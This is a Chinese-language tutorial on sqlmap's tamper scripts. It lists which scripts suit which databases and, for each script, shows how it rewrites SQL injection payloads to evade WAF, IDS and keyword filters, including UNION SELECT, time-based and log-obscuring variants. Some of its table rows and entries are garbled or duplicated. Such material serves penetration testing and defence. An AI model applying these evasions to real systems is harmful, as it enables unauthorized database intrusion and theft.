sqlmap中tamper的简介
⼀、SQLMap中tamper的简介
1.tamper的作⽤
使⽤SQLMap提供的tamper脚本,可在⼀定程度上避开应⽤程序的敏感字符过滤、绕过WAF规则的阻挡,继⽽进⾏渗透攻击。
部分防护系统的缩写:
WAF:Web应⽤程序防⽕墙,Web Application Firewall
IPS:⼊侵防御系统, Intrusion Prevention System
IDS:⼊侵检测系统,Intrusion Detection System
2.tamper⽤法
--tamper=TAMPER 利⽤给定的脚本进⾏篡改注⼊数据。其⽤法可举例说明:
python sqlmap.py -u ".../?uname=admin&pwd=pass123"--level=5--risk=3 -p "uname" --tamper=xxx.py
表⽰对指定的url地址,以所设置的level等级、risk等级,并采⽤选定的tamper篡改脚本对参数“uname”进⾏检测
⼆、适配不同数据库类型的测试tamper
当使⽤SQLMap篡改脚本执⾏渗透测试时,⾯对众多tamper可能会⽐较困惑,⼀开始不晓得该使⽤哪些脚本来测试。有的脚本是适⽤于常⽤数据库的SQL注⼊攻击,有的适⽤于特定类型的数据库,还有的适⽤于某种数据库的特定版本范围。为了相对明确的了解tamper的使⽤场景,把tamper的使⽤类型和范围作⼀下划分,具体如下:
SQLMap⽬录中的所有tamper script
tamper = apostrophemask , apostrophenullencode , appendnullbyte , base64encode , between , bluecoat , chardoubleencode , charencode , charunicodeencode , concat2concatws , equaltolike , greatest , halfversionedmorekeywords , ifnull2ifisnull , modsecurityversioned , modsecurityzeroversioned , multiplespaces ,
nonrecursivereplacement , percentage , randomcase , randomcomments , securesphere , space2comment , space2dash , space2hash , space2morehash ,
space2mssqlblank , space2mssqlhash , space2mysqlblank , space2mysqldash , space2plus , space2randomblank , sp_password , unionalltounion , unmagicquotes , versionedkeywords , versionedmorekeywords
通⽤的测试tamper
tamper = apostrophemask , apostrophenullencode , base64encode , between , chardoubleencode , charencode , charunicodeencode , equaltolike , greatest , ifnull2ifisnull , multiplespaces , nonrecursivereplacement , percentage , randomcase , securesphere , space2comment , space2plus , space2randomblank , unionalltounion ,
unmagicquotes
MSSQL(Microsoft SQL Servre)
tamper = between , charencode , charunicodeencode , equaltolike , greatest , multiplespaces , nonrecursivereplacement , percentage , randomcase , securesphere , sp_password , space2comme
nt , space2dash , space2mssqlblank , space2mysqldash , space2plus , space2randomblank , unionalltounion , unmagicquotes
MySQL
tamper = between , bluecoat , charencode , charunicodeencode , concat2concatws , equaltolike , greatest , halfversionedmorekeywords , ifnull2ifisnull ,
modsecurityversioned , modsecurityzeroversioned , multiplespaces , nonrecursivereplacement , percentage , randomcase , securesphere , space2comment , space2hash , space2morehash , space2mysqldash , space2plus , space2randomblank , unionalltounion , unmagicquotes , versionedkeywords , versionedmorekeywords , xforwardedfor Oracle
tamper = between , charencode , equaltolike , greatest , multiplespaces , nonrecursivereplacement , randomcase , securesphere , space2comment , space2plus , space2randomblank , unionalltounion , unmagicquotes , xforwardedfor
Microsoft Access
tamper = between , bluecoat , charencode , charunicodeencode , concat2concatws , equaltolike , gre
atest , halfversionedmorekeywords , ifnull2ifisnull ,
modsecurityversioned , modsecurityzeroversioned , multiplespaces , nonrecursivereplacement , percentage , randomcase , securesphere , space2comment , space2hash , space2morehash , space2mysqldash , space2plus , space2randomblank , unionalltounion , unmagicquotes , versionedkeywords , versionedmorekeywords PostgreSQL
tamper=between , charencode , charunicodeencode , equaltolike , greatest , multiplespaces , nonrecursivereplacement , percentage , randomcase , securesphere , space2comment , space2plus , space2randomblank , xforwardedfor
tamper适⽤的数据库类型&版本
(*) 可能适⽤于所有版本
(-) 不适⽤
TAMPER MySQL MSSQL Oracle PostgreSQL
apostrophemask****
apostrophenullencode----
appendnullbyte****
base64encode4,5,5.5200510g-
between 5.1---
bluecoat****
apostrophemask9.0.320002005-9.3
charunicodeencode4,5.0 and 5.5200510g8.3,8.4,9.0
charencode*---
isnull的用法commalessmid*---
concat2concatws****
equaltolike****
greatest< 5.1---
halfversionedmorekeywords 5.0 and 5.5---
ifnull2ifisnull**** informationschemacomment4,5.0,5.5200510g8.3,8.4,9.0 lowercase5---modsecurityversioned5---modsecurityzeroversioned**** multiplespaces**** nonrecursivereplacement**** overlongutf8 5.1.56,5.5.112000, 2005N/A9 percentage4, 5.0,5.5200510g8.3,8.4,9.0 randomcase**** randomcomments**** securesphere4,5.0,5.5200510g8.3,8.4,9.0 space2comment----
space2dash 4.0,5.0---
space2hash>= 5.1.13---
space2morehash-2000, 2005--
space2mssqlblank**--
space2mssqlhash****
space2plus4,5.0,5.5200510g8.3,8.4,9.0 space2randomblank-*--
sp_password**** symboliclogical**** unionalltounion**** unmagicquotes4, 5.0,5.5200510g8.3,8.4,9.0 uppercase**** varnish*---versionedkeywords>=5.1.13---versionedmorekeywords**** xforwardedfor****
三、SQLMap中tamper篡改脚本的功能解释
apostrophemask.py
功能:对引号进⾏utf-8格式编码(%EF%BC%87)
平台:All
举例:1 AND '1'='1 ==> 1 AND %EF%BC%871%EF%BC%87=%EF%BC%871 apostrophenullencode.py
功能:⽤⾮法的双unicode字符(%00%27)替换引号字符
平台:All
举例:1 AND '1'='1 ==> 1 AND %00%271%00%27=%00%271 appendnullbyte.py
功能:在有效载荷结束位置加载零字节字符编码
平台:Microsoft Access
举例:1 AND 1=1 ==> 1 AND 1=1%00
base64encode.py
功能:⽤base64格式进⾏编码
平台:All
举例:1' AND SLEEP(5)# ==> MScgQU5EIFNMRUVQKDUpIw==
between.py
功能:⽤between替换⼤于号(>)
平台:Mssql2005、MySQL 4/5.0/5.5、Oracle 10g、PostgreSQL 8.3/8.4/9.0
举例:
1 AND A > B -- ==> 1 AND A NOT BETWEEN 0 AND B --
1 AND A = B -- ==> 1 AND A BETWEEN B AND B --
bluecoat.py
功能:对SQL语句替换空格字符为(%09),并替换"="--->"LIKE"
平台:MySQL 5.1, SGOS
举例:SELECT username FROM users WHERE id = 1 ==> SELECT%09username FROM%09users WHERE%09id LIKE 1
apostrophemask.py
功能:⽤utf-8格式编码引号(如:%EF%BC%87)
平台:All
举例:1 AND '1'='1 ==> 1 AND %EF%BC%871%EF%BC%87=%EF%BC%871
charunicodeencode.py
功能:对字符串进⾏Unicode格式转义编码
平台:Mssql 2000,2005、MySQL 5.1.56、PostgreSQL 9.0.3 ASP/ASP.NET
举例:SELECT FIELD%20FROM TABLE ==>
%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045 charencode.py
功能:采⽤url格式编码1次
平台:Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
举例:SELECT FIELD FROM%20TABLE ==> %53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45
chardoubleencode.py
功能:采⽤url格式编码2次
平台:All
举例:SELECT FIELD FROM%20TABLE ==>
%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545
commalessmid.py
功能:将payload中的逗号⽤ from和for代替,⽤于过滤了逗号并且是3个参数的情况
平台:MySQL 5.0, 5.5
举例:MID(VERSION(), 1, 1) ==> MID(VERSION() FROM 1 FOR 1)
concat2concatws.py
功能:CONCAT() ==> CONCAT_WS(),⽤于过滤了CONCAT()函数的情况
平台: MySQL 5.0
举例:CONCAT(1,2) ==> CONCAT_WS(MID(CHAR(0),0,0),1,2)
equaltolike.py
功能:= ==> LIKE,⽤于过滤了等号"="的情况
平台:Mssql 2005、MySQL 4, 5.0 and 5.5
举例:SELECT * FROM users WHERE id=1 ==> SELECT * FROM users WHERE id LIKE 1
greatest.py
功能:> ==> GREATEST
平台:MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
举例:1 AND A > B ==> 1 AND GREATEST(A, B+1)=A
a和b+1⽐较,取两者中的最⼤值为a;则a >= b+1,亦即a > b
halfversionedmorekeywords.py
功能:空格 ==> /*!0 (在关键字前添加注释)
平台:MySQL 4.0.18, 5.0.22(Mysql < 5.1)
举例:union ==> /*!0union
ifnull2ifisnull.py
功能:IFNULL(A, B) ==> IF(ISNULL(A), B, A)
平台:MySQL 5.0 and 5.5
举例:IFNULL(1, 2) ==> IF(ISNULL(1),2,1)
informationschemacomment.py
功能:
在 information_schema 后⾯加上 /**/ ,⽤于绕过对 information_schema 的情况
retVal = re.sub(r"(?i)(information_schema).", "g<1>/**/.", payload)
平台:All
举例:select table_name from information_schema.tables ==> select table_name from information_schema/**/.tables
lowercase.py
功能:将 payload ⾥的⼤写转为⼩写
平台:Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
举例:SELECT table_name FROM INFORMATION_SCHEMA.TABLES ==> select table_name from information_schema.tables modsecurityversioned.py
功能:⽤注释来包围完整的查询语句,⽤于绕过 ModSecurity 开源 waf
平台:MySQL 5.0
举例:1 AND 2>1-- ==> 1 /*!30874AND 2>1*/--
modsecurityzeroversioned.py
功能:⽤注释来包围完整的查询语句,⽤于绕过 waf ,和上⾯类似
平台:Mysql
举例:1 and 2>1--+ ==> 1 /!00000and 2>1/--+
multiplespaces.py
功能:围绕SQL关键字添加多个空格
平台:All
举例:1 UNION SELECT foobar ==> 1 UNION SELECT foobar
nonrecursivereplacement.py
功能:关键字双写,可⽤于关键字过滤
平台:All
举例:1 UNION SELECT 2-- ==> 1 UNIONUNION SELESELECTCT 2--
overlongutf8.py
功能:转换给定的payload当中的所有字符
平台:All
举例:SELECT FIELD FROM TABLE WHERE 2>1 ==> SELECT%C0%AAFIELD%C0%AAFROM%C0%AATABLE%C0%AAWHERE%C0%AA2%C0%BE1 percentage.py
功能:⽤百分号来绕过关键字过滤,在关键字的每个字母前⾯都加⼀个(%)
平台:Mssql 2000, 2005、MySQL 5.1.56, 5.5.11、PostgreSQL 9.0
举例:SELECT FIELD FROM TABLE ==> %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
randomcase.py
功能:将 payload 随机⼤⼩写
平台:Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
举例:INSERT ==> InseRt
randomcomments.py
功能:在 payload 的关键字中间随机插⼊注释符 /**/ ,可⽤于绕过关键字过滤
平台:Mysql
举例:INSERT ==> I / ** / N / ** / SERT
securesphere.py
功能:在payload后追加特殊构造的字符串
平台:All
举例:1 AND 1=1 ==> 1 AND 1=1 and '0having'='0having'
space2comment.py
功能:⽤注释符 // 代替空格,⽤于空格的绕过
平台:Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
举例:SELECT id FROM users ==> SELECT//id//FROM//users
space2dash.py
功能:⽤[注释符(--)+⼀个随机字符串+⼀个换⾏符]替换控制符
平台:MSSQL、 SQLite
举例:union select 1,2--+ ==> union--HSHjsJh%0Aselect--HhjHSJ%0A1,2--+
space2hash.py
功能:⽤[注释符(#)+⼀个随机字符串+⼀个换⾏符]替换控制符
平台:Mysql
举例:union select 1,2--+ ==> union%23HSHjsJh%0Aselect%23HhjHSJ%0A1,2--+
space2morehash.py
功能:⽤多个[注释符(#)+⼀个随机字符串+⼀个换⾏符]替换控制符
平台:MySQL >= 5.1.13
举例:union select 1,2--+ ==> union %23 HSHjsJh %0A select %23 HhjHSJ %0A%23 HJHJhj %0A 1,2--+ space2mssqlblank.py
功能:⽤随机的空⽩符替换payload中的空格
blanks = ('%01', '%02', '%03', '%04', '%05', '%06', '%07', '%08', '%09', '%0B', '%0C', '%0D', '%0E', '%0F', '%0A')平台:Mssql 2000,2005
举例:SELECT id FROM users ==> SELECT%0Eid%0DFROM%07users
space2mssqlhash.py
功能:⽤[字符# +⼀个换⾏符]替换payload中的空格
平台:MSSQL、MySQL
举例:union select 1,2--+ ==> union%23%0Aselect%23%0A1,2--+
space2plus.py
功能:⽤加号(+)替换空格
平台:All
举例:SELECT id FROM users ==> SELECT+id+FROM+users
space2randomblank.py
功能:⽤随机的空⽩符替换payload中的空格
平台:Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
举例:SELECT id FROM users ==> SELECT%0Did%0DFROM%0Ausers
sp_password.py
功能:在payload语句后添加 sp_password ,⽤于迷惑数据库⽇志(Space ==> sp_password)
平台:Mssql
举例:1 AND 9227=9227-- ==> 1 AND 9227=9227-- sp_password
symboliclogical.py
功能:⽤ && 替换 and ,⽤ || 替换 or ,⽤于这些关键字被过滤的情况
平台:All
举例:
1 and 1=1 ==> 1 %26%26 1=1
1 or 1=1 ==> 1 %7c%7c 1=1
unionalltounion.py
功能:⽤ union select 替换union all select
平台:All
举例:union all select 1,2--+ ==> union select 1,2--+
unmagicquotes.py
功能:⽤宽字符绕过 GPC addslashes
平台:All
举例:1' and 1=1 ==> 1%df%27 and 1=1--
uppercase.py
功能:将payload中的⼩写字母转为⼤写格式
平台:Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
举例:insert ==> INSERT
varnish.py
功能:添加⼀个HTTP头“ X-originating-IP ”来绕过WAF
平台:headers = ("headers", {})headers["X-originating-IP"] = "127.0.0.1"return payload
举例:All
versionedkeywords.py
功能:对⾮函数的关键字进⾏注释
平台:MySQL 4.0.18, 5.1.56, 5.5.11
举例:1 union select user() ==> 1/!UNION//!SELECT/user()
versionedmorekeywords.py
功能:对每个关键字进⾏注释处理
平台:MySQL 5.1.56, 5.5.11
举例:1 union select user() ==> 1/!UNION//!SELECT/user()
xforwardedfor.py
功能:添加⼀个伪造的HTTP头“ X-Forwarded-For ”来绕过WAF
平台:All
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论